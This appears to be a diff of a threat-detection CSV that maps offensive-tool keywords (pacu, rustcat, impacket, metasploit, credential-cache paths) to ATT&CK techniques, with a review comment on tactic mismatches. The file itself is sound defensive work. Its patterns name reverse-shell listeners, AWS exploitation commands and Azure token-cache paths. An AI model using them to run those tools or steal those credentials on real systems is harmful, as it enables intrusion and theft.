-"*pacu --exec *","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3687","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z"
-"*pacu --list-modules*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3687","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z"
-"*pacu --module-args=*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3687","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z"
-"*pacu --module-info*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3687","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z"
-"*pacu --module-name *","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3687","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z"
-"*pacu --session *","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3687","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z"
-"*pacu --set-regions *","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3687","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z"
-"*pacu --whoami*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3687","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z"
-"*pacu/core pacu*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3687","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z"
-"*pacu/last_update.txt*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3687","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z"
-"*pacu-master.zip*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","3687","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z"
-"*padlock2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*package_cvs_into_lse.sh*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","1","N/A","9","10","2925","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z"
+"*package=impacket*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
+"*PackMyPayload.py*","offensive_tool_keyword","PackMyPayload","A PoC that packages payloads into output containers to evade Mark-of-the-Web flag & demonstrate risks associated with container file formats","T1027 - T1036 - T1048 - T1070 - T1096 - T1195","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/mgeeky/PackMyPayload/","1","1","N/A","10","8","729","123","2023-09-14T23:45:52Z","2022-02-08T19:26:28Z"
+"*PackMyPayload-master*","offensive_tool_keyword","PackMyPayload","A PoC that packages payloads into output containers to evade Mark-of-the-Web flag & demonstrate risks associated with container file formats","T1027 - T1036 - T1048 - T1070 - T1096 - T1195","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/mgeeky/PackMyPayload/","1","1","N/A","10","8","729","123","2023-09-14T23:45:52Z","2022-02-08T19:26:28Z"
+"*pacman -S rustcat*","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","0","N/A","10","10","574","56","2023-10-02T11:32:12Z","2021-06-04T17:03:47Z"
+"*pacu --exec *","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z"
+"*pacu --list-modules*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z"
+"*pacu --module-args=*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z"
+"*pacu --module-info*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z"
+"*pacu --module-name *","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z"
+"*pacu --session *","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z"
+"*pacu --set-regions *","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z"
+"*pacu --whoami*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z"
+"*pacu/core pacu*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z"
+"*pacu/last_update.txt*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z"
+"*pacu-master.zip*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z"
+"*padlock2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
 "*padre -u *http*://*","offensive_tool_keyword","padre","padre?is an advanced exploiter for Padding Oracle attacks against CBC mode encryption","T1203 - T1059.003 - T1027.002","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/glebarez/padre","1","0","N/A","8","2","178","19","2023-09-25T19:11:44Z","2019-12-30T13:52:03Z"
 "*padre-master.zip*","offensive_tool_keyword","padre","padre?is an advanced exploiter for Padding Oracle attacks against CBC mode encryption","T1203 - T1059.003 - T1027.002","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/glebarez/padre","1","1","N/A","8","2","178","19","2023-09-25T19:11:44Z","2019-12-30T13:52:03Z"
 "*papacat -l -p *","offensive_tool_keyword","JustEvadeBro","JustEvadeBro a cheat sheet which will aid you through AMSI/AV evasion & bypasses.","T1562.001 - T1055.012 - T1218.011","TA0005 - TA0040 - TA0010","N/A","N/A","Defense Evasion","https://github.com/sinfulz/JustEvadeBro","1","0","N/A","8","3","260","25","2023-03-30T06:22:24Z","2021-05-11T06:26:10Z"
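Review bot: The added `*pacman -S rustcat*` row pairs techniques `T1090.001 - T1090.002 - T1046` with tactics `TA0011 - TA0009 - TA0040`, but only TA0011 (Command and Control) corresponds to T1090; T1046 sits under TA0007 (Discovery), and none of the listed techniques belongs to Collection or Impact. For a tool the row itself describes as a port listener and reverse shell, `TA0011 - TA0007` would keep the tactics field consistent with its own techniques, so ATT&CK-based triage and dashboards do not mislabel hits on this keyword. Separately, the re-added `*Out-RundllCommand*` row still carries `T1550 T1555 T1212 T1558` without the ` - ` separator used by every other row and `N/A` for tactics, so a consumer splitting on ` - ` sees a single token; `T1550 - T1555 - T1212 - T1558` would match the rest of the file.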
@@ -14506,25 +14672,25 @@ "*parrotsec.org/download/*","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Parrot-security-*.iso*","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*parse_aggressor_properties*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" -"*parse_nessus_file*","offensive_tool_keyword","crackmapexec","function name from nessus.py from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*parse_nmap_xml*","offensive_tool_keyword","crackmapexec","function name from nmap.py from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*parse_nessus_file*","offensive_tool_keyword","crackmapexec","function name from nessus.py from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*parse_nmap_xml*","offensive_tool_keyword","crackmapexec","function name from nmap.py from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" "*parse_shellcode*","offensive_tool_keyword","cobaltstrike","A protective and Low Level Shellcode Loader that defeats modern EDR systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - 
T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/cribdragg3r/Alaris","1","1","N/A","10","10","846","136","2021-11-01T05:00:43Z","2020-02-22T15:42:37Z" "*ParseMSALCache*.azure\msal_token_cache.bin*","offensive_tool_keyword","SharpAzbelt","This is an attempt to port Azbelt by Leron Gray from Nim to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources","T1082 - T1003 - T1027 - T1110 - T1078","TA0006 - TA0007 - TA0005 - TA0004 - TA0003","N/A","N/A","Discovery - Collection","https://github.com/redskal/SharpAzbelt","1","0","N/A","8","1","23","6","2023-09-21T21:47:32Z","2023-09-21T21:44:03Z" "*ParseMSALCache*Appdata\Local\.IdentityService\msal.cache*","offensive_tool_keyword","SharpAzbelt","This is an attempt to port Azbelt by Leron Gray from Nim to C#. 
It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources","T1082 - T1003 - T1027 - T1110 - T1078","TA0006 - TA0007 - TA0005 - TA0004 - TA0003","N/A","N/A","Discovery - Collection","https://github.com/redskal/SharpAzbelt","1","0","N/A","8","1","23","6","2023-09-21T21:47:32Z","2023-09-21T21:44:03Z" "*parser.exe -a *.dmp*","offensive_tool_keyword","udmp-parser","A Cross-Platform C++ parser library for Windows user minidumps.","T1005 - T1059.003 - T1027.002","TA0009 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/0vercl0k/udmp-parser","1","0","N/A","6","2","160","22","2023-08-27T18:30:24Z","2022-01-30T18:56:21Z" "*parser.exe -a *.dmp*","offensive_tool_keyword","udmp-parser","A Cross-Platform C++ parser library for Windows user minidumps.","T1005 - T1059.003 - T1027.002","TA0009 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/0vercl0k/udmp-parser","1","0","N/A","6","2","160","22","2023-08-27T18:30:24Z","2022-01-30T18:56:21Z" -"*PassDetective extract*","offensive_tool_keyword","PassDetective","PassDetective is a command-line tool that scans shell command history to detect mistakenly written passwords - API keys and secrets","T1059 - T1059.004 - T1552 - T1552.001","TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/aydinnyunus/PassDetective","1","0","N/A","7","1","51","3","2023-08-16T16:51:15Z","2023-07-22T12:31:57Z" -"*PassDetective-main.*","offensive_tool_keyword","PassDetective","PassDetective is a command-line tool that scans shell command history to detect mistakenly written passwords - API keys and secrets","T1059 - T1059.004 - T1552 - T1552.001","TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/aydinnyunus/PassDetective","1","1","N/A","7","1","51","3","2023-08-16T16:51:15Z","2023-07-22T12:31:57Z" +"*PassDetective extract*","offensive_tool_keyword","PassDetective","PassDetective is a command-line tool that scans shell command 
history to detect mistakenly written passwords - API keys and secrets","T1059 - T1059.004 - T1552 - T1552.001","TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/aydinnyunus/PassDetective","1","0","N/A","7","1","52","3","2023-08-16T16:51:15Z","2023-07-22T12:31:57Z" +"*PassDetective-main.*","offensive_tool_keyword","PassDetective","PassDetective is a command-line tool that scans shell command history to detect mistakenly written passwords - API keys and secrets","T1059 - T1059.004 - T1552 - T1552.001","TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/aydinnyunus/PassDetective","1","1","N/A","7","1","52","3","2023-08-16T16:51:15Z","2023-07-22T12:31:57Z" "*passhunt.exe*","offensive_tool_keyword","PassHunt","PassHunt searches drives for documents that contain passwords or any other regular expression. Its designed to be a simple. standalone tool that can be run from a USB stick.","T1081 - T1083 - T1003 - T1039 - T1213","TA0003 - TA0010","N/A","N/A","Information Gathering","https://github.com/Dionach/PassHunt","1","1","N/A","N/A","1","60","36","2014-07-11T09:08:02Z","2014-07-11T08:46:20Z" -"*passhunt.exe*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*passhunt.exe*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" "*passhunt.py*","offensive_tool_keyword","PassHunt","PassHunt searches drives for documents that contain passwords or 
any other regular expression. Its designed to be a simple. standalone tool that can be run from a USB stick.","T1081 - T1083 - T1003 - T1039 - T1213","TA0003 - TA0010","N/A","N/A","Information Gathering","https://github.com/Dionach/PassHunt","1","1","N/A","N/A","1","60","36","2014-07-11T09:08:02Z","2014-07-11T08:46:20Z" -"*passivex.asm*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*passivex.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*passphrase-rule1.rule*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*passphrase-rule2.rule*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*passphrase-wordlist*","offensive_tool_keyword","passphrase-wordlist","This project includes a massive wordlist of phrases (over 20 million) and two hashcat rule files for GPU-based cracking. The rules will create over 1.000 permutations of each phase.","T1003 - T1110 - T1113 - T1137","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/initstring/passphrase-wordlist","1","0","N/A","N/A","10","989","149","2023-03-16T03:22:53Z","2017-12-05T20:53:13Z" +"*passivex.asm*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*passivex.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*passphrase-rule1.rule*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*passphrase-rule2.rule*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*passphrase-wordlist*","offensive_tool_keyword","passphrase-wordlist","This project includes a massive wordlist of phrases (over 20 million) and two hashcat rule files for GPU-based cracking. 
The rules will create over 1.000 permutations of each phase.","T1003 - T1110 - T1113 - T1137","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/initstring/passphrase-wordlist","1","0","N/A","N/A","10","992","149","2023-03-16T03:22:53Z","2017-12-05T20:53:13Z" "*pass-station search tomcat*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*PassTheCert.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation 